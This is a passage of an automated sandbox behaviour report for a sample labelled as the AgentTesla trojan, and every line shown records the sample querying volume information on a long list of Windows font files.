                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
